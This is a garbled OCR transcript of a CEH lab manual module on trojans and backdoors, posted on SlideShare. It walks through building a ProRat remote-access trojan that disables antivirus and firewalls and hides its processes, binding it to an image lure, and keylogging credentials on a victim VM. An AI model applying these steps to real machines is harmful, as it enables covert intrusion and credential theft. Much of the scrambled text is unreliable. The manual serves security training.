Your SlideShare is downloading. ×
  • Like
Ceh v8 labs module 06 trojans and backdoors
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Now you can save presentations on your phone or tablet

Available for both IPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Ceh v8 labs module 06 trojans and backdoors

  • 337 views
Published

 

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
337
On SlideShare
0
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
91
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. CEH Lab Manual T ro ja n s a n d B a c k d o o rs M o d u le 06
  • 2. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s T ro ja n s a n d B a c k d o o r s A Trojan is a program th a t contains a m alicious or harm ful code inside apparently harm less program m ing or data in such a iray th a t i t can g et control and cause damage, such as m ining the file allocation table on a hard drive. I CON KEY ^~! V a l u a b l e 1 L a b S c e n a rio A c c o r d in g to B a n k In t o s e r io u s r is k s S e c u r it y N e w s (h t t p :/ / w w w .b a n k in f o s e c u r it y .c o m ), in f o r m a tio n T r o ja n s T est tout k n o w l e d g e ____________ m W e b e x e r c is e c o m p o s e p r o m is e d d e v ic e is w h ic h 111 m A n d r o id p o t e n t ia lly a n a lic io u s a p p s a re a n y d e v ic e s , a t o p e n t o r r is k th e F B b e c a u s e e n v ir o n m a r o u n d , p e r s o n a l e n t s o is I th e a re th e a n d s e n s itiv e w a r n s . r e a l im B u t p r o b le m p o s s ib le p o t e n tia l f o r in f o r m e x p e r ts is to a t io n s a y a n y m a lic io u s c o n t r o l. fin a n c ia l s to r e d m 0 11 o b ile a p p lic a tio n s , A n d a n y w h e r e fr a u d . W o r k b o o k r e v ie w A c c o r d in g a d v a n c e d to c a p t u r in g a c c e s s s o ld Y o u a re t h e f t b la c k a s e c u r ity e x p e r ts , a ta k e t h e n t h e m T r o ja n th e k e y lo g g e r th a t b a n k in g th a t u s e s t o le n o v e r , is T r o ja n s t e a ls a n d lo g in I D s c h e d u le s p e c ific a lly k n o w n s a s a n b y p a s s w o r d s a n d c it a d e l, c r e d e n tia ls o n lin e - b a n k in g to fr a u d u le n t d e s ig n e d f o r tr a n s a c tio n s . f in a n c ia l fr a u d a n d m a r k e t. a d m p r o t e c t in g o f v a lu a b le is H a c k e r s t in s th e in c lu d e z e u s , a c c o u n t s , c r e a te d 0 1 1 s e c u r ity o f k e y s tr o k e s . o n lin e H a c k e r s c y b e r v a r ia n t th e d a ta in is t r a t o r n e t w o r k f r o m o f y o u r f r o m th e c o m T r o ja n s n e t w o r k , a n d p a n y , a n d a n d y o u r b a c k d o o r s , id e n t it y jo b r e s p o n s ib ilit ie s T r o ja n a tta c k s , th e th e ft. L a b O b je c tiv e s T h e o b je c t iv e o f tin s o f th e la b is to h e lp s tu d e n ts le a r n to d e te c t Trojan a n d backdoor a tta c k s . T h e o b je c t iv e a la b in c lu d e : ■ C r e a t in g s e r v e r ■ D e t e c t in g T r o ja n s ■ A t t a c k in g a a n d t e s tin g a n d n e t w o r k v u ln e r a b ilitie s & Tools a n d a n e t w o r k f o r a tta c k b a c k d o o r s u s in g fla w s s a m p le T r o ja n s a n d d o c u m e n t in g a ll d e te c te d L a b E n v iro n m e n t demonstrated in this lab are available in T o c a r r y ‫י‬ o u t A t in s , y o u n e e d : Window Server 2008 c o m p u t e r r u n n in g a s G u e s t- 1 in v ir t u a l m a c h in e D EH :C ToolsCEHv8 ‫י‬ Window 7 r u n n in g a s G u e s t- 2 in v ir t u a l m a c h in e Module 06 Trojans C E H La b M anual Page 425 ‫י‬ A ■ and Backdoors w e b b r o w s e r w it h A d m in is tr a tiv e In te r n e t p r iv ile g e s to a c c e s s r u n t o o ls E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 3. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s L a b D u r a t io n T im e : 4 0 M in u t e s O v e r v ie w A T r o ja n is a d a m a g e , s u c h it h p r o g r a m th a t programming h a r m le s s W o f T r o ja n s a n d B a c k d o o r s th e a s h e lp c o m p u te r o f a n d pictures, 0 1‫־‬ r u in in g d a ta a n d / 0 1‫ ־‬s h o w b e s u c h 111 a a n a b le m e s s a g e s re a d w a y th a t 0 11 a a c c e s s p e r s o n a l th e 0 11 h a r m g e ts a tta c k e r to o r t a b le file allocation d ie Trojan, a w o u ld malicious c o n t a in s it t ill c o d e get control c a n h a r d in s id e a p p a r e n tly a n d c a u s e d is k . stored passwords to 111 a delete files, display d o c u m e n ts , s c re e n . La b T ask s TASK 1 P ic k Overview a n o r g a n iz a t io n d ia t y o u e d u c a t io n a l in s tit u t io n , a R e c o m m e n d e d la b s ■ C r e a t in g ■ W ■ P r o x y ■ H a r a p p in g T T P to a s s is t y o u S e r v e r a f e e l is w o r t h y o f y o u r c o m m e r c ia l c o m p a n y , w id i T r o ja n s U s in g T r o ja n th e U s in g P r o R a t O n e F ile a tte n tio n . 0 1‫ ־‬p e r h a p s a n d a T in s c o u ld b e a n n o n p r o t it c h a r ity . b a c k d o o rs : to o l E X E M a k e r S e r v e r T r o ja n T r o ja n ■ R e m o t e A c c e s s ‫י‬ D e te c t in g T r o ja n s U s in g A t e lie r W e b R e m o t e la b C o m e x e r c is e . m a n d e r T r o ja n s ‫י‬ C r e a t in g a S e r v e r U s in g th e T h e e t ■ C r e a t in g a S e r v e r U s in g th e B io d o x ■ C r e a t in g a S e r v e r U s in g th e M ‫י‬ H a c k W in d o w s 7 u s in g o S u c k e r M e ta s p lo it L a b A n a ly s is A n a ly z e y o u r a n d t a r g e t ’s P L E A S E d o c u m e n t s e c u n ty T A L K th e r e s u lts p o s tu r e T O Y O U R C E H La b M anual Page 426 a n d R r e la te d I N E L A to e x p o s u r e S T T E D R U C T O th e d ir o u g h T O T H R I F I S G iv e p u b lic a n d Y O H U y o u r tre e A V E o p in io n 0 11 in f o r m a tio n . Q U E S T I O N S L A B . E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 4. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s Lab C r e a tin g a S e r v e r U s in g t h e P r o R a t T ool A Trojan is a program th a t contains m alicious or harm ful code inside apparent/)‫׳‬ harm less program m ing or data in such a way th a t i t can g et control and cause damage, such as m ining the file allocation table on a hard drive. I CON KEY 1 ^ 7 V a lu a b le L a b S c e n a r io A s m o r e a n d m o r e p e o p le r e g u la r ly u s e th e In t e r n e t , c y b e r s e c u r ity is b e c o m in g in f o r m a tio n m T est you r k n o w le d g e = W e b e x e r c is e o r e a re im u s in g in f o r m W o r k b o o k r e v ie w m a t io n In t e r n e t h a c k e r s m p o r t a n t c o m m e a lw a r e b y c a n a ls o h a c k e r s h a c k n o t w it h a n d y e t p e r s o n a l s y s te m s o n ly s n if f y o u r p e o p le a t io n , v ir u s e s , m e a n s a c h in e . a re s , y o u r t h a t n o t fin a n c ia l w o r m p r o t e c t in g d a ta , w h ic h m a n y in f o r m w it h a b o u t a n o t h e r m th e O t h e r a n d m a w a r e d a ta , h a c k e r s it . a n d T r o ja n a c h in e a tta c k s o f b u s in e s s h o r s e s . f r o m c a n H a c k e r m lis t e n in c lu d e B u t a lw a r e ; to y o u r s p o o fin g , h ija c k in g . m a y d e n ia l- o f - s e r v ic e b u s in e s s . to is u n ic a t io n a n d e v e r y o n e , in f e c t in g s e c u r ity m a p p in g , S o m f o r ta k e c o n t r o l a tta c k , A g a in s t w h ic h o f y o u r m a k e s h ig h - p r o file w e b a n d m ta r g e t a n y c o m s e r v e rs o t h e r p u t e r s s u c h a s m a c h in e s to u n a v a ila b le b a n k s a n d c o n d u c t f o r n o r m c r e d it a a l c a r d g a te w a y s . Y o u a re in c lu d e t h e ft a s e c u r ity a d m in is t r a t o r p r o t e c t in g th e n e t w o r k o f v a lu a b le d a ta f r o m th e o f y o u r f r o m c o m p a n y , T r o ja n s n e t w o r k , a n d a n d a n d id e n t it y y o u r jo b b a c k d o o r s , r e s p o n s ib ilit ie s T r o ja n a tta c k s , th e ft. L a b O b je c t iv e s T h e o b je c t iv e o f tin s la b is to h e lp s tu d e n ts le a r n to d e te c t T r o ja n a n d b a c k d o o r & Tools demonstrated in this lab are a tta c k s . T h e o b je c tiv e s o f th e la b in c lu d e : available in D EH :C ToolsCEHv8 ■ C r e a t in g ■ D e t e c t in g a s e r v e r T r o ja n s a n d a n d te s tin g th e n e t w o r k f o r a tta c k b a c k d o o r s Module 06 Trojans and Backdoors C E H La b M anual Page 427 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 5. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s ‫י‬ A t t a c k in g a n e t w o r k v u ln e r a b ilitie s a n d u s in g fla w s s a m p le T r o ja n s a n c l d o c u m e n t in g a ll d e te c te d L a b E n v ir o n m e n t T o e a r n ‫ ״‬t in s ■ o u t, y o u Prorat T h e n e e d : t o o l lo c a t e d D:CEH-ToolsCEHv8 Module 06 Trojans a t and BackdoorsTrojans TypesRemote Access Trojans (RAT)ProRat ■ A c o m p u t e r r u n n in g W in d o w s ■ A c o m p u t e r r u n n in g Window 8 (Virtual Machine) ■ Windows Server 2008 ‫י‬ A ‫י‬ w e b b r o w s e r A d m in is tr a tiv e S e r v e r r u n n in g p r iv ile g e s to as H o s t M a c h in e 111 V ir t u a l M a c h in e Internet w it h 2 0 1 2 a c c e s s t o o ls 11111 L a b D u r a t io n T u n e : 2 0 M in u t e s O v e r v ie w o f T r o ja n s a n d B a c k d o o r s A T r o ja n h a r m le s s is a d a m a g e , s u c h Note: T h e d iffe r fr o m c lie n t is p r o g r a m th a t p r o g r a m m in g th e a s r u in in g v e r s io n s d a ta d ie file o f th e w h a t is in s a m e a s s h o w n d ie malicious c o n t a in s o r in a a llo c a tio n c r e a te d la b , s u c h t a b le C lie n t o r b u t 111 d iis th e w a y o n H o s t a c u ia l o r h a r m fu l th a t a it c a n h a r d a n d p ro c e s s c o d e a p p a r e n tly a n d c a u s e d r iv e . a p p e a r a n c e o f in s id e get control c r e a tin g o f th e th e w e b s it e s e r v e r a n d m a y d ie la b . La b T ask s L a u n c h W in d o w s Create Server V ir t u a l M a c h in e a n d n a v ig a t e to Z:CEHv8 Module (RAT)ProRat. with ProRat 2. D o u b le - c lic k 3 . C E H La b M anual Page 428 8 06 Trojans and BackdoorsTrojans TypesRemote Access Trojans C lic k ProRat.exe 111 W Create Pro Rat Server in d o w s t o 8 V ir t u a l M s ta r t p r e p a r in g to a c h in e . c r e a te a s e r v e r. E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 6. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s PflD H R C H .n ET Pf?D FE55 ID r> H L HTTEHnET !!! Cne o n ct English PCIn fo M ssag e e Ap a n p lic tio s W dw in o s A m -T d in F P F n yS ff F M n g r u n tu ile a a e !E p re x lo r SearchF s ile Rg e istry C n l Pan o tro el S u D w PC ht o n C ba lip o rd K yL g e e o gr G D mg P ssw rd ive a a e a o s R D w lo e . o n dr P te rin r O lin E ito P C n ective n e d r ro o n Ca re te ‫ י‬C e t Downloader S r e ( K a t ► rae evr 2 by) C e t C I V c i Ls ( 6K a t r a e G i t m it 1 b y ) ^Help F IG U R E 4 . T h e Create Server w in d o w 1 .1 : P r o R a t m a i n w i n d o w a p p e a r s . Create Server Pro on ective N tifica n(N o an R u C n o tio etw rk d o ter) Supports Reverse Connection ‫ ט‬U Pro onn se C ective N tifica n o tio » un *p o o. o1 .c m IP (D S) A d ss: N d re N tifica n o tio s 1 y= J P a s s w o r d b u tto n : R e t r ie v e p a s s w o rd s fr o m G eral Settin s en g m a n y s e r v i c e s , s u c h as T est M il N tifica n a o tio p o p 3 a c c o u n ts , m e sse n g e r, I E , m a il, e tc. D oesn't support R everse Connection B dw File in ith T est Q U M il N tifica n se a o tio o b rmn y h o o E-M AIL: b m e a @ a o .c m Server Ex n n te sio s IC Pager N tifica n Q o tio D oesn't support R everse Connection Q U IC Pager N tifica n se Q o tio Server Icon icquin: T est [r] C I N tifica n G o tio D oesn't support R everse Connection W) H lp e Server Siz e: r T est Q U C I N tifica n se G o tio ttp w .y u . o / i- in p ra g C I URL: h ://w w o rsite c rn cg b / ro tc i G C reate Server 3 2K ayt 4 b F IG U R E 5 . C lic k General Settings Password, Victim Name, o v e r 6 . C E H La b M anual Page 429 th e U n c h e c k c o n n e c t io n th e y o u h ig h lig h t e d to 1 .2 : P r o R a t C r e a t e S e r v e r W i n d o w c h a n g e a n d h a v e th e to options fe a tu r e s , s u c h Port Number th e v ic t im o r a s s h o w n 111 Server Port. Server a s y o u liv e th e w is h th e to c o n n e c t s e t tin g s f o llo w in g d e fa u lt . s c r e e n s h o t. E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 7. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s Server P rt: o Server Passw rd o : V N m: ictim a e Q 3 ea fake e r mssa e iv rro e g . Q •1l server o inta •e t n s ll. Q C A -FWo s rt. ill V n ta Q d a leW is b indow XP SP2 Secu C n r s rity e te I... Q D leW isab indow XP F w ll. s ire a Q Ha W e r indow XP R s estore P in o ts. Q )on't sen LA n tifica n fro (i9 .i6 .”.“j o (1 .*.x j d N o tio s m 2 8 r 0 .x I IPro tectio fo re o in Local Server n r mv g In isib v ility Q H e Processes fro A T M ag (9 /2 /X id m ll ask an ers x k P) Q H eV id alues F mA k do R istry Ed rs(9 /2 P) ro ll in f eg ito x k/X Q H e N es F mM n (9 /2 /K id am ro sco fig x k P) Q U Te in teProcess (2k/XP) n rm a G eral Settin s en g B dw File in ith Server Ex n n te sio s Server Icon Ity ! N o te : y o u can use D y n a m ic D N S to c o n n e c t o v e r th e In t e r n e t b y u s in g n o - i p a c c o u n t r e g is t r a t io n . Server Siz e: r C reate Server 3 2K ayt 4 b F IG U R E 7 . 8 . Bind with File C lic k u s in g .jpg th e C h e c k file to to 1 .3 : P r o R a t C r e a t e S e r v e r - G e n e r a l S e t t i n g s b in d b in d th e th e s e r v e r w it h a file ; 111 t in s la b w e a re s e r v e r. Bind server with a file. C lic k Select File, a n d n a v ig a t e to Z:CEHv8 Module 06 Trojans and BackdoorsTrojans TypesRemote Access Trojans (RAT)ProRatlmages. 9 . m S e le c t th e Girl.jpg file to b in d w it h th e s e r v e r. C lip b o a rd : T o re a d d ata fro m ra n d o m access T is File w b B d d h ill e in e : m e m o ry. B dw File in ith Server Ex n n te sio s Server Icon Server Siz e: C reate Server 3 2K ayt 4 b I-------------F IG U R E C E H La b M anual Page 430 1 .4 : P r o R a t B i n d i n g w i t h a f ile E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 8. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s 1 0 . S e le c t Girl.jpg 111 Look in: th e w in d o w a n d t h e n c lic k Open to b in d th e f ile . Images ‫תז°11ו‬ £Q1 V N C V N C T r o ja n s ta rts a s e rv e r d a e m o n in th e in f e c t e d s y s te m . Rle nam e: Girl Open Files o type: f Cancel F IG U R E 1 1 . £ 9 C lic k OK a fte r s e le c t in g th e 1 .5 : P r o R a t b i n d i n g a n im a g e im a g e f o r b in d in g w it h a s e r v e r. F ile m a n a g e r: T o m a n a g e v ic t im d ir e c to r y f o r a d d , d e le t e , a n d m o d if y . 1 2 . 1 11 Server Extensions Server Extension C E H La b M anual Page 431 s e t tin g s , s e le c t EXE (lia s ic o n s u p p o r t ) 111 Select o p t io n s . E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 9. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s Select Server Ex n n te sio ^ EXE (H ico su p rt) as n p o N tifica n o tio s Q SCR (H ico su p rt) as n p o Q PIF (H n ico su p rt) as o n p o G eral Settin s en g Q C M(H n ico s p o O as o n u p rt) Q BA (H n ico s p o T as o n u p rt) B dw File in ith Server Ex n n te sio s Server Icon £ Q G iv e D a m a g e : T o f o r m a t t h e e n t ir e s y s te m f ile s . Server Siz e: C reate Server 4 7K ayt 9 b r F IG U R E 1 3 . 1 11 Server Icon b u t t o n a t 1 .7 : P r o R a t S e r v e r E x t e n s i o n s S e t t i n g s s e le c t a n y r ig h t s id e b o t t o m o f o f th e th e ic o n s , P r o R a t a n d c lic k th e Create Server w in d o w . N tifica n o tio s G eral Settin s en g M B dw File in ith m Server Ex n n te sio s I t c o n n e c t s to th e v ic t im u s in g a n y V N C H U 11 Server Icon v ie w e r w it h th e p a s s w o rd “ s e c r e t.” jJ V) H lp e Server Ico : n Server Siz e: C o se n Icon h o ew C reate Server 4 7K ayt 9 b I F IG U R E 1 4 . C lic k O K a lt e r th e s e r v e r h a s 1 .8 : P r o R a t c r e a t i n g a s e r v e r b e e n p r e p a r e d , a s s h o w n 111 th e lo llo w in g s c r e e n s h o t. C E H La b M anual Page 432 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 10. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s F IG U R E 1 5 . N to £ G SH T T P D H T T P o w y o u c a n s e n d victim’s th e m 1 .9 : P r o R a t S e r v e r h a s c r e a t e d d ie s e r v e r a c h in e a s , file lo r 111 d i e by mail e x a m p le , s a m e c u r r e n t d ir e c to r y o r a a n y c o m m celebration u n ic a t io n file to m e d ia r u n . i s a s m a ll Applicator Tools s e rve r th a t c a n b e Vicvr e m b e d d e d in s i d e a n y m Preview pane E p ro g ra m . I t c a n b e w ra p p e d w it h a g e n u in e p r o g r a m []‫־‬B Details pane A& Manage S Extra large icons t ‫־‬t N" ₪ ‫־‬ Large icons f t| M5d un icons | | j Small icons lirt | j ‫ ״‬Details S 1 ( g a m e c l e s s .e x e ). W h e n □ Item check boxes □ Filename extensions I I Hidden items ______________ Layout_________ e x e c u te d , it tu rn s a o c o m p u t e r in t o a n in v is ib le w e b s e rve r. © ^ 1 Show/hide ‫נ״י‬ « Trcjans Types ► Femote Access Trojans (RAT) A K Favorites *. J . Downlead Irraces ■ Desktop J , Language £ Download} 1 Recent places S3J | ^ bnded.server | ^ 1 Fnglish 1 f Libraries ‫־‬ ^ £ ProRat F*| Documtnte j__ Readme J* Music ^ T ‫ ״‬rk6h fcl Pictures |__ Version.Renewals 81 Videos Homegrojp AP Computei sL Local Disk O , 5 ? CEH-Tools (1a ^(1 Network v 9 items 1 item selected 208 MB F IG U R E 1 6 . N o w g o to W in d o w s S e r v e r 1 .1 0 : P r o R a t C r e a t e S e r v e r 2 0 0 8 a n d n a v ig a t e to Z:CEHv8 Module 06 Trojans and BackdoorsTrojans TypesRemote Access Trojans (RAT)ProRat. 1 7 . C E H La b M anual Page 433 D o u b le - c lic k binder_server.exe a s s h o w n 111 th e f o llo w in g s c r e e n s h o t. E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 11. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s . El• p ital ‫ י‬T ‫0׳‬J%n(Trt>« » Rencte A cr«s "roiflrs RAT ( ‫ * י‬PraRat | id t ^•w Tjolc t#lp V iew Oroanize ▼ • M t I•I Site Tavoi ite -»‫־‬ ks i| ? cajres ^ ^ 0° *° r>ornn#ntc £ ‫״‬ T " T ™ ----------------- Pate modified— | - | Typ |- 1> H Music 1 More » Folders v I J i Botnet 'rojars I ^ j j j , Ya5»cn_R.c‫ ־‬o5 «n Comnand Shell ~r0)s I Defacenent ‫־‬ro;ars I [ : Readne [ ^ ‫ ־‬uHoct J4 Destnjave T'ojans I Ebandng Trojans I J4 E-Mal T0‫׳‬j3ns I JA FTP Trojar I GUITrojors I HTTP H I P S "rpjars I S I J4 MACOSXTrojons ICMP Backdoor I J i Proxy Server Trojan: . Remote Access “ rcj?- * I J . Apocalypse Atelie‫ ׳‬Web Remji X I 4 I j.. ProRat . D*fkCo‫׳‬r«tRAT I . VNC’ rojans £ M a rl H C S. F IG U R E 1 8 . N o w s w it c h to W in d o w s Windows Server 2008 I C M P T r o ja n : C o v e r t c h a n n e ls a r e m e t h o d s in P r o R a t m a in -O g* . New Text Docuneil •No... I ‘ w in d o w 8 V ir t u a l a n d a n d 1 .1 1 : P r o R a t W i n d o w s S e r v e r 2 0 0 8 th e c lic k liv e M a c h in e p o r t a n d n u m b e r e n te r a s th e th e I P a d d r e s s d e fa u lt 111 o f th e Connect. w h i c h a n a tt a c k e r c a n h id e d a t a i n a p r o t o c o l d i a t is 1 9 . 111 t i n s la b , th e I P a d d r e s s o f W in d o w s S e r v e r 2 0 0 8 is (1 0 .0 .0 .1 3 ) u n d e t e c t a b le . Note: I P a d d re s s e s F T m ig h t b e d if f e r 111 c la s s r o o m la b s ProRat V1.9 mum - Poit PCIn fo Ap a n p lic tio s M ssa e e g W dw in o s Am -T d in F P Ca ht F n yS ff F Mn g r u n tu ile a a e !E p re x lo r SearchF s ile C n l Pan o tro el R g try e is S u D w PC ScreenS o ht o n ht C ba lip o rd Kyo gr eL g e G D mg P ssw rd ive a a e a o s R D w lo e . o n dr P te rin r Services O lin E ito P C n e n e d r ro o n ctive Ca re te F IG U R E 2 0 . E n t e r c lic k C E H La b M anual Page 434 th e password y o u 112: P r o R a t C o n n e c t in g In f e c t e d S e r v e r p r o v id e d a t th e tim e o t c r e a tin g th e s e r v e r a n d OK. E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 12. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s Passw rd o : O K F IG U R E 2 1 . N o w c lic k y o u a re PC Info connected to a n d 1 .1 3 : P r o R a t c o n n e c t i o n w i n d o w th e c h o o s e Cne acl th e v ic t im s y s te m m a c h in e . in f o r m T o a t io n a s te s t 111 th e th e c o n n e c t io n , f o llo w in g f ig u r e . B f P> > —ProRat V 1 .9 IC o n n e c te d [1 0 .0 .0 .1 3 ^ ^ ^ H B B B ^ ^ ^ ^ ^ r ‫- ׳‬ x1 F H d H H C H . n e T p « o r e 5 5 1 D n F 1 L 1m‫־‬e p r 1 E T !!! m Poit: g n g o n t e c h n i q u e s c a ll e d English t u n n e lin g , w h ic h a llo w o n e P If C no p r o t o c o l t o b e c a r r ie d o v e r Ds o n c i c n et //////// PC Information //////// IB A pi ai n p lc to s Ms a e es g Computer N e am User N e am Windows Uer Windows Language Windows Path System Path Tem Path p Productld Workgroup Data Wn o s i dw Ca ht a n o t h e r p ro to c o l. A m -T d i FP n F n ySuf Fl M n g r un t f ie a a e !xl rr E poe S a c Fl s e r h ie C nr l P n l o to a e R gsr e i ty S u Dw P Sr e S o h t o n C ce n h t Kyo gr eL g e Ci b ad lp o r Gv D m g P s w r s i e a a e a s od R Dwl dr . o no e Pi t r rne Rn u F IG U R E 2 2 . 2 Attack System Using Keylogger N o w c lic k KeyLogger N O 9/23/2012 S se I f r ai n y t mnomto M i A de si R gsr al d r s n e i t y W Hl ; ep 1 .1 4 : P r o R a t c o n n e c t e d c o m p u t e r w i d o w steal to u s e r p a s s w o r d s f o r th e o n lin e s y s te m . [r?~^roRa^7^onnectedn0l0l0^3r~ P H □ H R C H .‫ ח‬E T P P G F E S S I C i n F I L in T E P r i E T !!! Ds o n c i c n et ip: Q j Q 2 Poit: g n i R: I I 11‫ ׳‬h //////// PC Information //////// P If C no A pi ai n p lc to s Ms a e es g Wn o s i dw Ca ht A m -T d i FP n F n ySuf Fl M n g r un t f ie a a e !xl rr E poe S a c Fl s e r h ie C nr l P n l o to a e R gsr e i ty S uDw P Sr e S o h t o n C ce n h t Ci b ad lp o r Kyo gr eL g e Gv D m g P s w r s i e a a e a s od R Dwl dr . o no e Pi t r rne Rn u Computer N e am User N e am Windows Uer Windows Language Windows Path System Path Tem Path p Productld Workgroup Data WIN-EGBHISG14L0 Administrator English (United St C:Windows C:Windowssysterna C:UsersADHINI~1 N O 9/23/2012 L i. Srie e vc s O ln E i o P o o n ci e ni e dt r r C n e tv S se I f r ai n y t mnomto M i A de si R gsr al d r s n e i t y L s vst d2 w bst s a t i ie 5 e ie Ce t r ae P i f r ai nR c i e . c nomto e ev d F IG U R E C E H La b M anual Page 435 English (United St C:Windows C:Windowssystemc C:UsersADMINI~1 L s vst d2 w bst s a t i ie 5 e ie Ce t r ae P i f r ai nR c i e . c nomto e ev d TASK 1 0 WIN-EGBHISG14L0 Administrator l -L Srie e vc s O ln E i o Fr C n e tv ni e dt r ' o o n ci e m R C o v e r t c h a n n e ls r e ly W Hl ; ep 1 .1 5 : P r o R a t K e y L o g g e r b u t t o n E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.
  • 13. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s 2 3 . m T h e Key Logger w in d o w w ill a p p e a r . T liis T r o ja n w o rk s lik e a r e m o t e d e s k to p a c c e s s . T h e h a c k e r g a in s c o m p le t e G U I a c c e s s o f th e r e m o t e s y s te m : ■ In f e c t v ic t im ’s c o m p u te r w it h s e rv e r.e x e a n d p la n t R e v e r s e C o n n e c t in g T r o ja n . ■ T h e T r o ja n c o n n e c ts to v i c t i m ’s P o r t t o t h e a t t a c k e r a n d e s t a b lis h in g a re v e rs e c o n n e c t io n . ■ A tta c k e r th e n has F IG U R E c o m p le t e c o n t r o l o v e r v i c t i m ’s m a c h i n e . 2 4 . N o w s w it c h N o t e p a d i File Windows Server 2008 to a n d 1 .1 6 : P r o R a t K e y L o g g e r w i n d o w ty p e a n y m a c h in e a n d o p e n a b r o w s e r o r te x t. Text Document -Notepad Edit Format View Help ‫פר‬ Hi th ere T h is is my username: xyz@yahoo.com password: test<3@#S!@l| m B a n k i n g T r o ja n s a re p r o g r a m t h a t s t e a ls d a t a f r o m in fe c t e d c o m p u te rs v ia w e b b ro w s e rs a n d A Ik. p ro te c te d s to ra g e . F IG U R E 2 5 . W h ile th e v ic t im p a s s w o r d , y o u 2 6 . N o w t im e C E H La b M anual Page 436 s w it c h t o t im e is c a n 1 .1 7 : T e s t t y p e d i n W i n d o w s S e r v e r 2 0 0 8 N o t e p a d message w r it in g a c a p t u r e th e to W t o c h e c k in d o w s f o r 8 lo g V ir t u a l d a ta o r e n t e r in g a user name a n d e n t ity . M a c h in e updates t r o m a n d th e c lic k Read Log v ic t im f r o m m a c h in e . E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 14. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s E =9/23/201211:55:28 PM a i b bth ism u am yz o .co h o is y sem e;x atyah o m p o ; testsh b tto ith sh u n ith assw rd iftl u w l iftb tto w 2 | R ea d Log | D e le te L o g L^L 1 ‫—י‬U L 1 !_ ‫רו‬ • ■ • S a v e as H e lp ----------------------------------------------------------1 C □ 11 •‫ י‬t 1 _ C le a r S c r e e n | K e y L o g R e c e iv e d . | F IG U R E 2 7 . Note: N o w P r o R a t y o u c a n K e y lo g g e r u s e w ill a lo t n o t 1 .1 8 : P r o R a t K e y L o g g e r w i n d o w o f fe a u ir e s r e a d s p e c ia l f r o m P r o R a t o n th e v ic t im ’s m a c h in e . c h a ra c te r s . L a b A n a ly s is A n a ly z e y o u r a n d d o c u m e n t t a r g e t ’s s e c u n t y d ie r e s u lts p o s tu re a n d r e la te d to e x p o s u re d ie la b e x e r c is e . th ro u g h p u b lic G iv e a n d y o u r fre e o p in io n o n in f o r m a tio n . PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB. Q u e s t io n s 1. C re a te W a n d 2 . s e rv e r w it h X P a d v a n c e d E v a lu a te a n d c it ie s o r o p t io n s F ir e w a ll, e tc ., s e n d v e r if y w h e d ie r y o u o d ie r C E H La b M anual Page 437 a in d o w s e x a m in e c a n it a n d s u c h c o m m u n ic a t e v a r io u s m e d io d s as K ill A c o n n e c t it to w it h th e to V - F W th e v ic tim c o n n e c t to o n v ic tim s ta r t, d is a b le m a c h in e , m a c h in e . v ic tim s i f d ie y a re 111 c o u n t r ie s . E th ic a l H ack in g and Countenneasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 15. M o d u le 0 6 - T r o ja n s a n d B a c k d o o r s T o o l / U t i l i t y In f o r m a t io n S u c c e s s f u l O u t p u t : p u t e r U s e r N a m W in d o w s W in d o w s W T o o l T e m p W □ Y e s P l a t f o r m 0 C E H La b M anual Page 438 C o n n e c t io n e : e A A d m b j e c t i v e s B lin d e d A c h ie v e d s e r v e r .e x e a t io n Y I N - E G B H I S G 14 L O in is t r a t o r Y e r : L a n g u a g e : P a t h : P a t h : I D E n g lis h (U n it e d S ta te s ) c : w in d o w s c : w in d o w s s y s t e m c : U s e r s A D M I N 3 2 I ~ l : o r k g r o u p : D a t a : a m P a t h : P r o d u c t o f In f o r m N in d o w s S y s t e m In t e r n e t c r e a tio n P C C o m P r o R a t C o l l e c t e d / O N O 9 / 2 3 / 2 0 1 2 R e q u ir e d 0 N o 0 !L a b s S u p p o r t e d C la s s r o o m E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
